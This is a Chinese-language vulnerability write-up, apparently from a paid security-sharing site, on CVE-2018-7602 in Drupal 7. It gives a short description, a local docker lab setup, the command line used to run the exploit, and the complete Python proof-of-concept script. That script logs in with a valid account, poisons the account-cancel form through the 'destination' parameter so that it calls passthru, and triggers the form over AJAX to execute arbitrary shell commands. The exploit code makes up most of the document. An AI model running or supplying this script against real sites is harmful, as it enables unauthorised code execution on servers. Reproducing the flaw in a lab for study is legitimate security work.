(CVE-2018-7602)Drupal_远程代码执行漏洞

030

# (CVE-2018-7602)Drupal 远程代码执行漏洞

一、漏洞简介
————

Drupal
7.x版本和8.x版本中的存在存在远程代码执行漏洞。远程攻击者可利用该中断执行任意代码。

二、漏洞影响
————

Drupal 7.x版本和8.x

三、复现过程
————

### 漏洞环境

执行如下命令启动drupal 7.57的环境:

docker-compose up -d

环境启动后,访问 `http://your-ip:8081/`
将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库。

### 漏洞复现

参考[ianxtianxt/CVE-2018-7602](https://github.com/ianxtianxt/CVE-2018-7600)的PoC。

如下图所示,执行以下命令即可复现该漏洞。示例命令为
`id`,如图红框中显示,可以执行该命令。

# “id”为要执行的命令 第一个drupal为用户名 第二个drupal为密码
python3 drupa7-CVE-2018-7602.py -c “id” drupal drupal http://127.0.0.1:8081/

![](/static/qingy/(CVE-2018-7602)Drupal_远程代码执行漏洞/img/rId27.png)

### CVE-2018-7602.py

#!/usr/bin/env python3

import requests
import argparse
from bs4 import BeautifulSoup

def get_args():
parser = argparse.ArgumentParser( prog=”drupa7-CVE-2018-7602.py”,
formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
epilog= ”’
This script will exploit the (CVE-2018-7602) vulnerability in Drupal 7 <= 7.58 using an valid account and poisoning the cancel account form (user_cancel_confirm_form) with the 'destination' variable and triggering it with the upload file via ajax (/file/ajax). ''') parser.add_argument("user", help="Username") parser.add_argument("password", help="Password") parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)") parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)") parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)") parser.add_argument("-x", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)") args = parser.parse_args() return args def pwn_target(target, username, password, function, command, proxy): requests.packages.urllib3.disable_warnings() session = requests.Session() proxyConf = {'http': proxy, 'https': proxy} try: print('[*] Creating a session using the provided credential...') get_params = {'q':'user/login'} post_params = {'form_id':'user_login', 'name': username, 'pass' : password, 'op':'Log in'} print('[*] Finding User ID...') session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf) get_params = {'q':'user'} r = session.get(target, params=get_params, verify=False, proxies=proxyConf) soup = BeautifulSoup(r.text, "html.parser") user_id = soup.find('meta', {'property': 'foaf:name'}).get('about') if ("?q=" in user_id): user_id = user_id.split("=")[1] if(user_id): print('[*] User ID found: ' + user_id) print('[*] Poisoning a form using \'destination\' and including it in cache.') get_params = {'q': user_id + '/cancel'} r = session.get(target, params=get_params, verify=False, proxies=proxyConf) soup = BeautifulSoup(r.text, "html.parser") form = soup.find('form', {'id': 'user-cancel-confirm-form'}) form_token = form.find('input', {'name': 'form_token'}).get('value') get_params = {'q': user_id + '/cancel', 'destination' : user_id +'/cancel?q[%23post_render][]=' + function + '&q[%23type]=markup&q[%23markup]=' + command } post_params = {'form_id':'user_cancel_confirm_form','form_token': form_token, '_triggering_element_name':'form_id', 'op':'Cancel account'} r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf) soup = BeautifulSoup(r.text, "html.parser") form = soup.find('form', {'id': 'user-cancel-confirm-form'}) form_build_id = form.find('input', {'name': 'form_build_id'}).get('value') if form_build_id: print('[*] Poisoned form ID: ' + form_build_id) print('[*] Triggering exploit to execute: ' + command) get_params = {'q':'file/ajax/actions/cancel/#options/path/' + form_build_id} post_params = {'form_build_id':form_build_id} r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf) parsed_result = r.text.split('[{"command":"settings"')[0] print(parsed_result) except: print("ERROR: Something went wrong.") raise def main(): print () print ('===') print ('| DRUPAL 7 <= 7.58 REMOTE CODE EXECUTION (SA-CORE-2018-004 / CVE-2018-7602) |') print ('| by pimps |') print ('===\n') args = get_args() # get the cl args pwn_target(args.target.strip(),args.user.strip(),args.password.strip(), args.function.strip(), args.command.strip(), args.proxy.strip()) if __name__ == '__main__': main() 参考链接 -------- > https://vulhub.org/\#/environments/drupal/CVE-2018-7602/

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
国内漏洞库
喜欢就支持一下吧
点赞0 分享
棉花糖的头像-棉花糖会员站年费会员
会员必看手册(20240920版本)-棉花糖会员站
会员必看手册(20240920版本)
会员必看手册(20240920版本)
9月20日 1.4W+
技术文章投稿兑换会员规则-棉花糖会员站
技术文章投稿兑换会员规则
技术文章投稿兑换会员规则
3月25日 3004
已开奖!国庆抽奖,猫咪赞助安全课程300份-棉花糖会员站
已开奖!国庆抽奖,猫咪赞助安全课程300份
已开奖!国庆抽奖,猫咪赞助安全课程300份
9月29日 2804
上心-SRC培训课-棉花糖会员站
上心-SRC培训课
上心-SRC培训课
5月7日 2310
王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站
王老师src真正的完整版(49个学生分享视频版本)
王老师src真正的完整版(49个学生分享视频版本)
6月8日 2165
钟北山SRC第七、八、九期-棉花糖会员站
钟北山SRC第七、八、九期
钟北山SRC第七、八、九期
5月9日 2104
相关推荐
海康威视漏洞合集-棉花糖会员站
海康威视漏洞合集
海康威视漏洞合集
6月1日 1022
Fastadmin框架lang任意文件读取-棉花糖会员站
Fastadmin框架lang任意文件读取
Fastadmin框架lang任意文件读取
6月16日 553
金蝶 EAS 反序列化 RCE-棉花糖会员站
金蝶 EAS 反序列化 RCE
金蝶 EAS 反序列化 RCE
10月11日 549
投稿:多个poc-棉花糖会员站
投稿:多个poc
投稿:多个poc
10月19日 522
eking管理易Html5Upload接口 任意文件上传-棉花糖会员站
eking管理易Html5Upload接口 任意文件上传
eking管理易Html5Upload接口 任意文件上传
10月16日 519
深圳市锐明技术股份有限公司Mangrove系统 任意用户添加-棉花糖会员站
深圳市锐明技术股份有限公司Mangrove系统 任意用户添加
深圳市锐明技术股份有限公司Mangrove系统 任意用户添加
10月11日 513
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容

作者
用户封面
棉花糖的头像-棉花糖会员站年费会员
关于“漏洞管理”的相关文档
三篇工控安全相关文档/报告
一些别人的CNVD报告
用友U8-CRM系统fillbacksetting.php SQL注入
用友GRP A Cloud 政府财务云rectifyAuditGaDoubt反序列化远程代码执行
明源云erp报表 geterpconfig 未授权访问
最近一周热门文章

1一些别人的CNVD报告

棉花糖的头像-棉花糖会员站年费会员10月20日
9999703

2渗透测试工程师3年经验求职简历(已脱敏)

棉花糖的头像-棉花糖会员站年费会员10月15日
9999554

3一些安全技术相关文档存档

棉花糖的头像-棉花糖会员站年费会员10月14日
9999553

4外面流传的2024小迪99集残缺版

棉花糖的头像-棉花糖会员站年费会员10月17日
9999522

5投稿:多个poc

Dylan的头像-棉花糖会员站年费会员10月19日
10522

6eking管理易Html5Upload接口 任意文件上传

棉花糖的头像-棉花糖会员站年费会员10月16日
9999519
标签云
龙浏览器未引用的服务路径特权升级齿轮地理位置查询鼠标鼠标按钮命令注入远程鼠标远程代码执行鼠标远程代码鼠标路径遍历鼠标本地文件包含鼠标未引用的服务路径鼠标事件状态栏鼠标默认错误页面跨站点脚本默认配置远程代码执行默认管理员凭据默认的调制解调器上的密码硬件远程默认权限默认权利默认弱密码编码默认密码默认安全性硬件远程默认和弱加密